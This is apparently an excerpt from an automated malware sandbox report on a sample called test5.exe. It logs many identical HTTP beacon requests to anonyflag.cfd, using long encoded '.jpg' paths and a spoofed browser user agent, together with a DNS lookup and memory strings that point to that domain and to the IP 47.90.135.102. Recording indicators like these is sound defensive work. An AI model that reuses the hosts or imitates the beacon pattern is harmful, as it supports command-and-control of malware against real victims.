Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: anonyflag.cfd

Source: test5.exe, 00000000.00000003.1713803951.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1736911456.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1871884712.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2192543471.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1908657330.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: test5.exe, 00000000.00000003.1736880484.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com4
Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.90.135.102/
Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.90.135.102/2Vcr
Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.90.135.102/2Vcr.
Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.90.135.102/2VcrB
Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.90.135.102/2VcrZ
Source: test5.exe, 00000000.00000003.2719078147.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/
Source: test5.exe, 00000000.00000003.1796650750.000002150C807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/7h
Source: test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/G
Source: test5.exe, 00000000.00000003.1926941171.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1945818103.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/Kb
Source: test5.exe, 00000000.00000003.1833670081.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/Kh
Source: test5.exe, 00000000.00000003.2489739391.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/P
Source: test5.exe, 00000000.00000003.2060130852.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079665751.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/Y
Source: test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/cros
Source: test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anonyflag.cfd/de
